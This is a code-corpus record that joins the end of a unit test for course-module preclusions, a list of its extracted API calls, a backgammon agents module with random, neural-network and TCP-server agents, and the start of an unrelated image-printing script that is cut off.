            outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
            assert_false(outcome[0])
            error_list = outcome[1]
            assert_equal(len(error_list), 2)
            assert_equal(error_list[0],
                         [self.test_module_code, self.ERROR_MSG_MODULE_CANNOT_BE_ITSELF])
            assert_equal(error_list[1],
                         [self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST])
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(preclude_info is not None)
            assert_equal(self.test_preclude_code, preclude_info[0][0])
            model.delete_all_preclusions(self.test_module_code)
            preclude_info = model.get_preclusion(self.test_module_code)
            assert_true(len(preclude_info) == 0)
| [
"components.model.add_preclusion",
"components.model.add_module",
"components.model.get_prerequisite",
"components.model.get_preclusion",
"components.model.delete_module",
"components.model.edit_preclusion",
"components.model.add_prerequisite",
"nose.tools.assert_true",
"components.model.delete_all_... | [((2043, 2179), 'components.model.add_module', 'model.add_module', (['self.test_module_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_module_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2059, 2179), False, 'from components import model\n'), ((2208, 2346), 'components.model.add_module', 'model.add_module', (['self.test_preclude_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_preclude_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2224, 2346), False, 'from components import model\n'), ((2375, 2514), 'components.model.add_module', 'model.add_module', (['self.test_preclude2_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_preclude2_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2391, 2514), False, 'from components import model\n'), ((2543, 2682), 'components.model.add_module', 'model.add_module', (['self.test_preclude3_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_preclude3_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2559, 2682), False, 'from components import model\n'), ((3863, 3905), 'components.model.delete_module', 'model.delete_module', (['self.test_module_code'], {}), '(self.test_module_code)\n', (3882, 3905), False, 'from components import model\n'), ((3914, 3958), 'components.model.delete_module', 'model.delete_module', (['self.test_preclude_code'], {}), '(self.test_preclude_code)\n', (3933, 3958), False, 'from components import model\n'), ((3967, 4012), 
'components.model.delete_module', 'model.delete_module', (['self.test_preclude2_code'], {}), '(self.test_preclude2_code)\n', (3986, 4012), False, 'from components import model\n'), ((4021, 4066), 'components.model.delete_module', 'model.delete_module', (['self.test_preclude3_code'], {}), '(self.test_preclude3_code)\n', (4040, 4066), False, 'from components import model\n'), ((4391, 4464), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (4412, 4464), False, 'from components import model\n'), ((4478, 4501), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (4489, 4501), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((4531, 4574), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (4551, 4574), False, 'from components import model\n'), ((4587, 4625), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (4598, 4625), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((4686, 4744), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (4698, 4744), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((4758, 4809), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (4786, 4809), False, 'from components import model\n'), ((4839, 4882), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (4859, 4882), False, 'from components import model\n'), ((5151, 5219), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 
'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (5171, 5219), False, 'from components import model\n'), ((5312, 5385), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (5333, 5385), False, 'from components import model\n'), ((5399, 5422), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (5410, 5422), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((5452, 5495), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (5472, 5495), False, 'from components import model\n'), ((5508, 5546), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (5519, 5546), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((5607, 5666), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude2_code', 'preclude_info[0][0]'], {}), '(self.test_preclude2_code, preclude_info[0][0])\n', (5619, 5666), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((5680, 5731), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (5708, 5731), False, 'from components import model\n'), ((5761, 5804), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (5781, 5804), False, 'from components import model\n'), ((6173, 6246), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (6194, 6246), False, 'from components import model\n'), ((6260, 6283), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), 
'(outcome[0])\n', (6271, 6283), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((6313, 6356), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (6333, 6356), False, 'from components import model\n'), ((6370, 6408), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (6381, 6408), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((6676, 6744), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (6696, 6744), False, 'from components import model\n'), ((6813, 6886), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (6834, 6886), False, 'from components import model\n'), ((6900, 6923), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (6911, 6923), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((6953, 6996), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (6973, 6996), False, 'from components import model\n'), ((7009, 7047), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (7020, 7047), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7554, 7627), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (7575, 7627), False, 'from components import model\n'), ((7640, 7663), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (7651, 7663), False, 'from nose.tools 
import assert_equal, assert_false, assert_true\n'), ((7693, 7736), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (7713, 7736), False, 'from components import model\n'), ((7750, 7788), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (7761, 7788), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7849, 7907), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (7861, 7907), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7920, 7979), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude2_code', 'preclude_info[1][0]'], {}), '(self.test_preclude2_code, preclude_info[1][0])\n', (7932, 7979), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7992, 8051), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude3_code', 'preclude_info[2][0]'], {}), '(self.test_preclude3_code, preclude_info[2][0])\n', (8004, 8051), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((8065, 8116), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (8093, 8116), False, 'from components import model\n'), ((8146, 8189), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (8166, 8189), False, 'from components import model\n'), ((8475, 8543), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (8495, 8543), False, 'from components import model\n'), ((8731, 8804), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 
'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (8752, 8804), False, 'from components import model\n'), ((8817, 8840), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (8828, 8840), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((8870, 8913), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (8890, 8913), False, 'from components import model\n'), ((8927, 8965), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (8938, 8965), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9026, 9084), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (9038, 9084), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9097, 9156), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude2_code', 'preclude_info[1][0]'], {}), '(self.test_preclude2_code, preclude_info[1][0])\n', (9109, 9156), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9169, 9228), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude3_code', 'preclude_info[2][0]'], {}), '(self.test_preclude3_code, preclude_info[2][0])\n', (9181, 9228), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9242, 9293), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (9270, 9293), False, 'from components import model\n'), ((9323, 9366), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (9343, 9366), False, 'from components import model\n'), ((9710, 9778), 'components.model.add_preclusion', 'model.add_preclusion', 
(['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (9730, 9778), False, 'from components import model\n'), ((9941, 10014), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (9962, 10014), False, 'from components import model\n'), ((10027, 10051), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (10039, 10051), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10145, 10239), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_preclude2_code, self.ERROR_MSG_MODULE_DUPLICATED]'], {}), '(error_list[0], [self.test_preclude2_code, self.\n ERROR_MSG_MODULE_DUPLICATED])\n', (10157, 10239), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10289, 10332), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (10309, 10332), False, 'from components import model\n'), ((10346, 10384), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (10357, 10384), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10397, 10455), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (10409, 10455), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10469, 10520), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (10497, 10520), False, 'from components import model\n'), ((10550, 10593), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (10570, 10593), False, 
'from components import model\n'), ((10929, 10997), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (10949, 10997), False, 'from components import model\n'), ((11165, 11238), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (11186, 11238), False, 'from components import model\n'), ((11251, 11275), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (11263, 11275), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11369, 11470), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST]'], {}), '(error_list[0], [self.test_invalid_module_code, self.\n ERROR_MSG_MODULE_DOESNT_EXIST])\n', (11381, 11470), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11520, 11563), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (11540, 11563), False, 'from components import model\n'), ((11577, 11615), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (11588, 11615), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11628, 11686), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (11640, 11686), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11700, 11751), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (11728, 11751), False, 'from components import model\n'), ((11781, 11824), 
'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (11801, 11824), False, 'from components import model\n'), ((11920, 11988), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (11940, 11988), False, 'from components import model\n'), ((12156, 12229), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (12177, 12229), False, 'from components import model\n'), ((12242, 12266), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (12254, 12266), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12360, 12461), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST]'], {}), '(error_list[0], [self.test_invalid_module_code, self.\n ERROR_MSG_MODULE_DOESNT_EXIST])\n', (12372, 12461), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12511, 12554), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (12531, 12554), False, 'from components import model\n'), ((12568, 12606), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (12579, 12606), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12619, 12677), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (12631, 12677), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12691, 12742), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', 
(['self.test_module_code'], {}), '(self.test_module_code)\n', (12719, 12742), False, 'from components import model\n'), ((12772, 12815), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (12792, 12815), False, 'from components import model\n'), ((13212, 13285), 'components.model.add_prerequisite', 'model.add_prerequisite', (['self.test_module_code', 'self.test_preclude_code', '(0)'], {}), '(self.test_module_code, self.test_preclude_code, 0)\n', (13234, 13285), False, 'from components import model\n'), ((13413, 13486), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (13434, 13486), False, 'from components import model\n'), ((13499, 13523), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (13511, 13523), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((13617, 13725), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_preclude_code, self.ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ]'], {}), '(error_list[0], [self.test_preclude_code, self.\n ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ])\n', (13629, 13725), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((13775, 13818), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (13795, 13818), False, 'from components import model\n'), ((13832, 13870), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (13843, 13870), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((13933, 13986), 'components.model.delete_all_prerequisites', 'model.delete_all_prerequisites', (['self.test_module_code'], {}), '(self.test_module_code)\n', (13963, 13986), False, 'from components 
import model\n'), ((14013, 14058), 'components.model.get_prerequisite', 'model.get_prerequisite', (['self.test_module_code'], {}), '(self.test_module_code)\n', (14035, 14058), False, 'from components import model\n'), ((14402, 14470), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (14422, 14470), False, 'from components import model\n'), ((14635, 14708), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (14656, 14708), False, 'from components import model\n'), ((14721, 14745), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (14733, 14745), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((14839, 14936), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_module_code, self.ERROR_MSG_MODULE_CANNOT_BE_ITSELF]'], {}), '(error_list[0], [self.test_module_code, self.\n ERROR_MSG_MODULE_CANNOT_BE_ITSELF])\n', (14851, 14936), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((14969, 15070), 'nose.tools.assert_equal', 'assert_equal', (['error_list[1]', '[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST]'], {}), '(error_list[1], [self.test_invalid_module_code, self.\n ERROR_MSG_MODULE_DOESNT_EXIST])\n', (14981, 15070), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((15120, 15163), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (15140, 15163), False, 'from components import model\n'), ((15177, 15215), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (15188, 15215), False, 'from nose.tools import assert_equal, assert_false, 
assert_true\n'), ((15228, 15286), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (15240, 15286), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((15300, 15351), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (15328, 15351), False, 'from components import model\n'), ((15381, 15424), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (15401, 15424), False, 'from components import model\n')] |
import asyncio
import json
import multiprocessing
import random
from functools import partial
from typing import Set, Callable, List, Iterator
import numpy as np
import torch
from torch import nn
import backgammon.game as bg
class RandomAgent(bg.Agent):
    """Agent that picks a legal move uniformly at random."""

    def get_action(self, available_moves: List[bg.Moves], board: bg.Board) -> bg.Moves:
        """Return one of the available moves, chosen at random; the board is ignored."""
        candidates = list(available_moves)
        return random.choice(candidates)
class NNAgent(bg.Agent):
    """Agent that scores each candidate position with a neural network."""

    def __init__(self, model: nn.Module) -> None:
        # Network mapping an encoded board position to a quality score.
        self.model = model

    def extract_features(self, board: bg.Board) -> torch.Tensor:
        """Encode *board* for the model.

        Produces 720 features: 15 slots per column for the current player,
        followed by the same layout for the opponent.
        """
        def encode_side(columns: bg.ColumnCheckersNumber) -> np.ndarray:
            encoded = np.zeros(board.NUM_COLS * board.NUM_CHECKERS)
            for col in range(board.NUM_COLS):
                if col not in columns:
                    continue
                offset = col * board.NUM_CHECKERS
                encoded[offset:offset + columns[col]] = 1
            return encoded

        own, opponent = board.to_schema()
        stacked = np.concatenate((encode_side(own), encode_side(opponent)))
        return torch.from_numpy(stacked).float().cuda()

    def estimate_moves(self, available_moves: List[bg.Moves], board: bg.Board) -> Iterator[float]:
        """Yield the model's score of the position reached by each candidate move."""
        for candidate in available_moves:
            with board.temp_move(*candidate) as resulting_board:
                yield self.estimate(resulting_board)

    def get_action(self, available_moves: List[bg.Moves], board: bg.Board) -> bg.Moves:
        """Return the move whose resulting position receives the lowest score."""
        candidates = list(available_moves)
        scores = list(self.estimate_moves(candidates, board))
        # Lowest score wins here -- the model's output is treated as
        # "smaller is better" for the moving player.
        best_index = int(np.argmin(scores))
        return candidates[best_index]

    def estimate(self, board):
        """Score a single board position with the model."""
        return self.model(self.extract_features(board))

    def __repr__(self):
        return '{}[model={}]'.format(self.__class__.__name__, self.model)

    @classmethod
    def with_model_constructor(cls, model: nn.Module) -> Callable[[], 'NNAgent']:
        """Bind *model* to this class, returning a zero-argument factory.

        :param model: torch model
        :return: callable that constructs an NNAgent around *model*
        """
        return partial(cls, model=model)
class TCPAgent(bg.Agent):
    """Agent that delegates move selection to a remote agent over TCP.

    The client side (get_action) serialises the board and legal moves as
    JSON and sends them to a server started via with_server, which runs
    the real agent in a child process.
    """
    def get_action(self, available_moves: List[bg.Moves], board: bg.Board) -> bg.Moves:
        """Send a message to the server, wait an answer and use it."""
        async def tcp_echo_client(message):
            reader, writer = await asyncio.open_connection(self.host, self.port)
            writer.write(message.encode())
            # Single fixed-size read: assumes the whole reply fits into
            # 100000 bytes -- TODO confirm for very large move lists.
            data = await reader.read(100000)
            writer.close()
            return json.loads(data.decode())
        message = json.dumps(dict(available_moves=available_moves, board=board.to_schema()))
        # NOTE(review): JSON round-trips tuples as lists, so the returned move
        # is list-shaped even if the server-side agent picked tuples -- confirm
        # that callers accept that shape.
        done = asyncio.run(tcp_echo_client(message))
        return done
    def __init__(self, host: str = None, port: int = None, agent_name: str = None):
        # Endpoint of the serving process; agent_name is used only in __repr__.
        self.host = host
        self.port = port
        self.agent_name = agent_name
    def __repr__(self):
        # Builds "ClassName[host][:port][agent_name]" from whichever fields are set.
        information = ''
        if self.host:
            information += f'[{self.host}]'
        if self.port:
            information += f'[:{self.port}]'
        if self.agent_name:
            information += f'[{self.agent_name}]'
        return f'{self.__class__.__name__}{information}'
    @classmethod
    def with_server(
            cls,
            agent_initializer: Callable[[], bg.Agent],
            port: int = None, host: str = None
    ) -> 'TCPAgent':
        """Start the serving agent in a child process and return a client TCPAgent.

        :param agent_initializer: zero-argument factory for the real agent;
            it is invoked inside the child process (see _server_runner).
        :param port: TCP port to serve on
        :param host: host/interface to bind
        :raises ValueError: if neither host nor port is given
        """
        if not host and not port:
            raise ValueError('Should specified at least host or port.')
        # One-way pipe (duplex=False): the child sends its agent's repr,
        # the parent only receives.
        pipe = multiprocessing.Pipe(False)
        proc = multiprocessing.Process(
            target=cls._server_runner,
            args=(agent_initializer,),
            kwargs=dict(port=port, host=host, pipe=pipe)
        )
        proc.start()
        pipe_out, _ = pipe
        # Blocks until the child has built its agent and reported its name.
        agent_name = pipe_out.recv()
        return cls(
            host=host, port=port, agent_name=agent_name
        )
    @classmethod
    def _server_runner(
            cls,
            agent_initializer: Callable[[], bg.Agent],
            host: str = None,
            port: int = None,
            pipe: multiprocessing.Pipe = None
    ) -> None:
        """Create a TCP server which receives board and available moves and selects an action.

        :param agent_initializer: function to initialize the Agent. Do not pass an Agent
            instance directly, because there are situations where it must be created
            inside this (child) process.
        :param host: host to bind
        :param port: port to listen on
        :param pipe: optional Pipe; if given, the created agent's name is sent through it.
        """
        async def handle(reader, writer):
            # Fixed-size read: assumes one request fits in 100000 bytes.
            data = await reader.read(100000)
            message = json.loads(data.decode())
            move = agent.get_action(
                available_moves=message['available_moves'],
                board=bg.Board.from_schema(*message['board'])
            )
            writer.write(json.dumps(move).encode())
            await writer.drain()
            writer.close()
        async def run_server():
            server = await asyncio.start_server(handle, host, port)
            async with server:
                await server.serve_forever()
        agent = agent_initializer()
        if pipe:
            _, pipe_in = pipe
            pipe_in.send(str(agent))
        # Serves until the child process is terminated.
        asyncio.run(run_server())
| [
"backgammon.game.Board.from_schema",
"asyncio.start_server",
"json.dumps",
"torch.from_numpy",
"numpy.zeros",
"asyncio.open_connection",
"functools.partial",
"numpy.argmin",
"multiprocessing.Pipe"
] | [((2669, 2694), 'functools.partial', 'partial', (['cls'], {'model': 'model'}), '(cls, model=model)\n', (2676, 2694), False, 'from functools import partial\n'), ((4171, 4198), 'multiprocessing.Pipe', 'multiprocessing.Pipe', (['(False)'], {}), '(False)\n', (4191, 4198), False, 'import multiprocessing\n'), ((937, 982), 'numpy.zeros', 'np.zeros', (['(board.NUM_COLS * board.NUM_CHECKERS)'], {}), '(board.NUM_COLS * board.NUM_CHECKERS)\n', (945, 982), True, 'import numpy as np\n'), ((2043, 2069), 'numpy.argmin', 'np.argmin', (['estimated_moves'], {}), '(estimated_moves)\n', (2052, 2069), True, 'import numpy as np\n'), ((2962, 3007), 'asyncio.open_connection', 'asyncio.open_connection', (['self.host', 'self.port'], {}), '(self.host, self.port)\n', (2985, 3007), False, 'import asyncio\n'), ((5681, 5721), 'asyncio.start_server', 'asyncio.start_server', (['handle', 'host', 'port'], {}), '(handle, host, port)\n', (5701, 5721), False, 'import asyncio\n'), ((5455, 5494), 'backgammon.game.Board.from_schema', 'bg.Board.from_schema', (["*message['board']"], {}), "(*message['board'])\n", (5475, 5494), True, 'import backgammon.game as bg\n'), ((1387, 1413), 'torch.from_numpy', 'torch.from_numpy', (['features'], {}), '(features)\n', (1403, 1413), False, 'import torch\n'), ((5534, 5550), 'json.dumps', 'json.dumps', (['move'], {}), '(move)\n', (5544, 5550), False, 'import json\n')] |
"""
Provides the molior python logging wrapper.
"""
import logging
import logging.config
from pathlib import Path
import yaml
# Path to the optional YAML logging configuration consumed by init_logger().
LOGGING_CFG_FILE = Path("/etc/molior/logging.yml")
def init_logger():
    """
    Load the logging configuration from LOGGING_CFG_FILE, if it exists.

    A corrupt or malformed config file is reported via the root logger
    instead of raising, so callers never fail on bad configuration.
    """
    if not LOGGING_CFG_FILE.exists():
        return
    with LOGGING_CFG_FILE.open() as log_cfg:
        try:
            # safe_load avoids arbitrary Python object construction from the
            # config file; bare yaml.load without a Loader is deprecated
            # (PyYAML >= 5.1) and unsafe on older versions.
            logging.config.dictConfig(yaml.safe_load(log_cfg))
        except (yaml.YAMLError, ValueError):
            # YAMLError covers both scanner and parser failures;
            # ValueError comes from dictConfig rejecting the schema.
            logging.getLogger().critical(
                "Config file '%s' corrupt", LOGGING_CFG_FILE
            )
def get_logger(name="molior"):
    """
    Return a configured molior logger.

    Args:
        name: Logger name; defaults to "molior".

    Returns:
        logging.Logger: The requested logger.
    """
    init_logger()
    logger = logging.getLogger(name)
    return logger
| [
"logging.getLogger",
"yaml.load",
"pathlib.Path"
] | [((146, 177), 'pathlib.Path', 'Path', (['"""/etc/molior/logging.yml"""'], {}), "('/etc/molior/logging.yml')\n", (150, 177), False, 'from pathlib import Path\n'), ((764, 787), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (781, 787), False, 'import logging\n'), ((380, 398), 'yaml.load', 'yaml.load', (['log_cfg'], {}), '(log_cfg)\n', (389, 398), False, 'import yaml\n'), ((476, 495), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (493, 495), False, 'import logging\n')] |
#!/usr/bin/env python3
import json
import base64
import requests
import random
def print_template(name):
    """Print one 'name;base64image' line, skipping excluded names.

    Roughly one out of three printed entries gets a picture attached.
    """
    for exclusion in exclusions:
        if exclusion in name:
            return
    wants_picture = random.randint(1, 3) == 1  # 1 of 3 should have a picture
    base64image = try_get_an_image(name) if wants_picture else ""
    print(f"{name};{base64image}")
def try_get_an_image(name):
    """Fetch a random placeholder photo and return it base64-encoded as ASCII text."""
    # Placeholder until maybe replaced by a real image search; the
    # requested dimensions are randomised, the name is currently unused.
    width = random.randint(200, 500)
